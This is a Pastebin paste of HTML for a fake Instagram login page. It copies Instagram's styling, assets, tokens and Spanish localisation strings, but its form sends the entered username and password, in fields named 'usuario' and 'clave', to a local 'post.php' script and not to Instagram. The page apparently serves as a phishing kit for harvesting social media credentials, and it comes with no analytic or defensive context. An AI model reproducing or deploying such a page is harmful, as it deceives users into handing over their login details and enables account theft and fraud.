Guest User

bbbbb

a guest
Jan 10th, 2019
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.80 KB | None | 0 0
  1.  
  2. <!DOCTYPE html>
  3. <html xmlns="http://www.w3.org/1999/xhtml" lang="es" class="hl-es not-logged-in ">
  4. <head>
  5. <meta charset="UTF-8" />
  6. <title>Log in &mdash; Instagram</title>
  7.  
  8. <meta name="robots" content="noimageindex" />
  9.  
  10. <link rel="Shortcut Icon" type="image/x-icon" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/favicon.ico" />
  11.  
  12. <meta name="apple-mobile-web-app-capable" content="yes" />
  13. <meta name="apple-mobile-web-app-status-bar-style" content="black" />
  14.  
  15. <link rel="apple-touch-icon-precomposed" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-precomposed.png" />
  16. <link rel="apple-touch-icon-precomposed" sizes="72x72" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-72x72-precomposed.png" />
  17. <link rel="apple-touch-icon-precomposed" sizes="114x114" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-114x114-precomposed.png" />
  18. <link rel="apple-touch-icon-precomposed" sizes="144x144" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-144x144-precomposed.png" />
  19.  
  20.  
  21. <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0" />
  22.  
  23.  
  24.  
  25. <script type="text/javascript" src="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/scripts/jquery.js"></script>
  26. <script type="text/javascript" src="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/scripts/bluebar.js"></script>
  27.  
  28.  
  29.  
  30.  
  31.  
  32. <meta id="viewport" name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width">
  33.  
  34. <script type="text/javascript">
  35. $(document).ready(function() {
  36. $("#id_username").focus();
  37. setTimeout(function() {
  38. document.getElementById('viewport').setAttribute('content', 'width='+ window.innerWidth + ', user-scalable=no');
  39. }, 5);
  40. });
  41. </script>
  42.  
  43.  
  44.  
  45. <link rel="stylesheet" type="text/css" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/cache/distillery/dialog-main.css"/>
  46. <!--[if lt IE 9]>
  47. <style>
  48. .dialog-outer {
  49. min-height: 0;
  50. }
  51. </style>
  52. <![endif]-->
  53.  
  54.  
  55. </head>
  56. <body class="p-dialog oauth-login">
  57.  
  58.  
  59. <div class="root">
  60.  
  61. <section class="dialog-outer">
  62. <div class="dialog">
  63.  
  64. <header>
  65. <h1 class="logo">Instagram</h1>
  66.  
  67. </header>
  68.  
  69.  
  70.  
  71.  
  72.  
  73. <div class="dialog-main">
  74.  
  75.  
  76.  
  77. <form method="POST" id="login-form" class="adjacent" action="post.php">
  78. <input type="hidden" name="csrfmiddlewaretoken" value="e8aa2707f5c13e8a02ff5df8e9487537"/>
  79. <p><label for="id_username">Enter Your Username:</label> <input name="usuario" maxlength="30" autocapitalize="off" autocorrect="off" type="text" id="usuario" /></p>
  80. <p><label for="id_password">Password:</label> <input autocapitalize="off" autocorrect="off" type="password" name="clave" id="clave" /></p>
  81. <p class="form-actions">
  82. <a href="/accounts/password/reset/">Forgot Your Password?</a>
  83. <input type="submit" class="button-green" value="Login" />
  84. </p>
  85. </form>
  86. </div>
  87.  
  88. </div>
  89. </section>
  90.  
  91. <script>
  92. $(window).load(
  93. function() {
  94. $("#id_username").focus();
  95. }
  96. );
  97. </script>
  98.  
  99. <div id="reactModalMountPoint"></div>
  100. </div> <!-- .root -->
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109.  
  110. <script type="text/javascript">
  111. var _gaq = _gaq || [];
  112. _gaq.push(['_setAccount', 'UA-58907283-4']);
  113. _gaq.push(['_setDomainName', 'none']);
  114. _gaq.push(['_setAllowLinker', true]);
  115. _gaq.push(["_set", "title", "Login"]);
  116. _gaq.push(["_setCustomVar", 1, "page", "Login", 3]);
  117.  
  118. _gaq.push(['_trackPageview']);
  119. (function() {
  120. var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  121. ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  122. var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  123. })();
  124. </script>
  125.  
  126. <script type="text/javascript">
  127. window._strings = {
  128.  
  129. "%(count)s comments": "%(count)s comments",
  130. "%(count)s followers": "%(count)s followers",
  131. "%(count)s following": "%(count)s following",
  132. "%(count)s likes": "%(count)s likes",
  133. "%(count)s more comments": "%(count)s more comments",
  134. "%(count)s new posts": "%(count)s new posts",
  135. "%(count)s people liked this photo": "%(count)s people liked this photo",
  136. "%(count)s photos,": "%(count)s photos,",
  137. "%(count)s posts": "%(count)s posts",
  138. "%(count)s+ new posts": "%(count)s+ new posts",
  139. "%(day)s %(month_name)s %(year)s": "%(day)s %(month_name)s %(year)s",
  140. "%(days)s days ago": "hace %(days)s días",
  141. "%(days)sd": "%(days)sd",
  142. "%(followerCount)s followers": "%(followerCount)s followers",
  143. "%(hours)s hours ago": "hace %(hours)s horas",
  144. "%(hours)sh": "%(hours)sh",
  145. "%(likes)s likes, %(comments)s comments": "%(likes)s likes, %(comments)s comments",
  146. "%(mediaCount)s photos": "%(mediaCount)s photos",
  147. "%(minutes)s minutes ago": "hace %(minutes)s minutos",
  148. "%(minutes)sm": "%(minutes)sm",
  149. "%(months)s months ago": "hace %(months)s meses",
  150. "%(seconds)s seconds ago": "hace %(seconds)s segundos",
  151. "%(seconds)ss": "%(seconds)ss",
  152. "%(user)s on Instagram": "%(user)s on Instagram",
  153. "%(username)s on Instagram": "%(username)s on Instagram",
  154. "%(weeks)s weeks ago": "hace %(weeks)s semanas",
  155. "%(weeks)sw": "%(weeks)ssem",
  156. "%(year)s %(month)s": "%(year)s %(month)s",
  157. "1": "1",
  158. "1 comment": "1 comment",
  159. "1 day ago": "Hace 1 día",
  160. "1 follower": "1 follower",
  161. "1 hour ago": "Hace 1 hora",
  162. "1 like": "1 like",
  163. "1 minute ago": "Hace un minuto",
  164. "1 month ago": "Hace 1 mes",
  165. "1 more comment": "1 more comment",
  166. "1 new post": "1 new post",
  167. "1 photo>": "1 photo\u003E",
  168. "1 second ago": "Hace 1 segundo",
  169. "1 week ago": "Hace 1 semana",
  170. "2": "2",
  171. "3": "3",
  172. "AM": "AM",
  173. "About us": "Acerca de",
  174. "Account Insights - Instagram": "Account Insights \u002D Instagram",
  175. "Add a caption...": "Add a caption...",
  176. "Add a comment": "Add a comment",
  177. "All items loaded": "All items loaded",
  178. "Apr": "Apr",
  179. "April": "Abril",
  180. "Are you sure you want to delete this comment?": "Are you sure you want to delete this comment?",
  181. "Are you sure?": "Are you sure?",
  182. "Audience": "Audience",
  183. "Aug": "Aug",
  184. "August": "Agosto",
  185. "Badges": "Insignias",
  186. "Blog": "Blog",
  187. "By using this embed, you agree to Instagram\\'s <a href=\"http://instagram.com/about/legal/terms/api/\">API Terms of Use</a>.": "By using this embed, you agree to Instagram\u005C\u0027s \u003Ca href\u003D\u0022http://instagram.com/about/legal/terms/api/\u0022\u003EAPI Terms of Use\u003C/a\u003E.",
  188. "Cancel": "Cancelar",
  189. "Content unavailable": "Content unavailable",
  190. "Copy Embed Code": "Copy Embed Code",
  191. "Copy this code:": "Copy this code:",
  192. "Couldn\\'t post comment": "Couldn\u005C\u0027t post comment",
  193. "Dec": "Dec",
  194. "December": "Diciembre",
  195. "Delete": "Eliminar",
  196. "Edit Profile": "Editar el perfil",
  197. "Embed": "Embed",
  198. "Feb": "Feb",
  199. "February": "Febrero",
  200. "Follow": "Seguir",
  201. "Follow %(username)s on Instagram": "Follow %(username)s on Instagram",
  202. "Follow friends and interesting people to see their photos here.": "Follow friends and interesting people to see their photos here.",
  203. "Following": "Eres seguidor(a)",
  204. "Forgot your password?": "Forgot your password?",
  205. "Fri": "Fri",
  206. "Friday": "Friday",
  207. "Here are some suggestions.": "Here are some suggestions.",
  208. "Home": "Inicio",
  209. "Jan": "Jan",
  210. "January": "Enero",
  211. "Jobs": "Empleo",
  212. "Jul": "Jul",
  213. "July": "Julio",
  214. "Jun": "Jun",
  215. "June": "Junio",
  216. "Leave a comment...": "Leave a comment...",
  217. "Like": "Me gusta",
  218. "Likes": "Me gusta",
  219. "Load More...": "Load More...",
  220. "Load more": "Load more",
  221. "Load more...": "Load more...",
  222. "Loading more...": "Loading more...",
  223. "Loading...": "Loading...",
  224. "Log Out": "Salir",
  225. "Log in": "Entrar",
  226. "Mar": "Mar",
  227. "March": "Marzo",
  228. "May": "Mayo",
  229. "Mon": "Mon",
  230. "Monday": "Monday",
  231. "More": "More",
  232. "Next photo": "Next photo",
  233. "No Recent Photos": "No Recent Photos",
  234. "No likes yet.": "Aún no tiene ningún \u0022Me gusta\u0022.",
  235. "No photos to show.": "No photos to show.",
  236. "Nov": "Nov",
  237. "November": "Noviembre",
  238. "Now": "Now",
  239. "Oct": "Oct",
  240. "October": "Octubre",
  241. "Open in App": "Abrir en la aplicación",
  242. "Others": "Others",
  243. "PM": "PM",
  244. "Password:": "Password:",
  245. "Paste it on your website, blog, or wherever you want to link to your profile!": "Paste it on your website, blog, or wherever you want to link to your profile!",
  246. "People you follow": "People you follow",
  247. "Performance": "Performance",
  248. "Photo by %(username)s": "Foto de %(username)s",
  249. "Posts": "Posts",
  250. "Press": "Prensa",
  251. "Press Page - Instagram": "Press Page \u002D Instagram",
  252. "Previous Posts": "Previous Posts",
  253. "Previous photo": "Previous photo",
  254. "Privacy": "Privacidad",
  255. "Report inappropriate": "Report inappropriate",
  256. "Requested": "Solicitud pendiente de aprobación",
  257. "Retry": "Retry",
  258. "Sat": "Sat",
  259. "Saturday": "Saturday",
  260. "Select your badge:": "Select your badge:",
  261. "Sep": "Sep",
  262. "September": "Septiembre",
  263. "Summary": "Summary",
  264. "Sun": "Sun",
  265. "Sunday": "Sunday",
  266. "Support": "Ayuda",
  267. "Terms": "Condiciones",
  268. "This user is private": "Este usuario es privado",
  269. "Thu": "Thu",
  270. "Thursday": "Thursday",
  271. "To follow %(username)s, you need to log in.": "To follow %(username)s, you need to log in.",
  272. "Toggle like": "Toggle like",
  273. "Tue": "Tue",
  274. "Tuesday": "Tuesday",
  275. "Username:": "Username:",
  276. "Video by %(username)s": "Video by %(username)s",
  277. "View Photo Page": "View Photo Page",
  278. "View Profile": "Perfil",
  279. "View Video Page": "View Video Page",
  280. "View on Instagram": "View on Instagram",
  281. "Wed": "Wed",
  282. "Wednesday": "Wednesday",
  283. "When you are finished following people,": "When you are finished following people,",
  284. "Write a comment...": "Write a comment...",
  285. "Yes": "Sí",
  286. "You must log in to add a comment.": "You must log in to add a comment.",
  287. "You must log in to like this photo.": "You must log in to like this photo.",
  288. "You need to be following %(username)s to like or comment": "Debes seguir a %(username)s para comentar o darle a Me gusta",
  289. "Your username or password was incorrect.": "Your username or password was incorrect.",
  290. "am": "am",
  291. "banner photo": "banner photo",
  292. "nd": "nd",
  293. "pm": "pm",
  294. "rd": "rd",
  295. "reload this page": "reload this page",
  296. "st": "st",
  297. "th": "th"
  298. };
  299. </script>
  300. <script type="text/javascript">window._sharedData = {"entry_data":{},"hostname":"instagram.com","config":{"csrf_token":"e8aa2707f5c13e8a02ff5df8e9487537"},"static_root":"\/\/d36xtkk24g8jdx.cloudfront.net\/bluebar\/07d0b7a"};</script>
  301. <script src="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/cache/bundles/webpack-common.js"></script>
  302.  
  303.  
  304. </body>
  305. </html>
Add Comment
Please, Sign In to add comment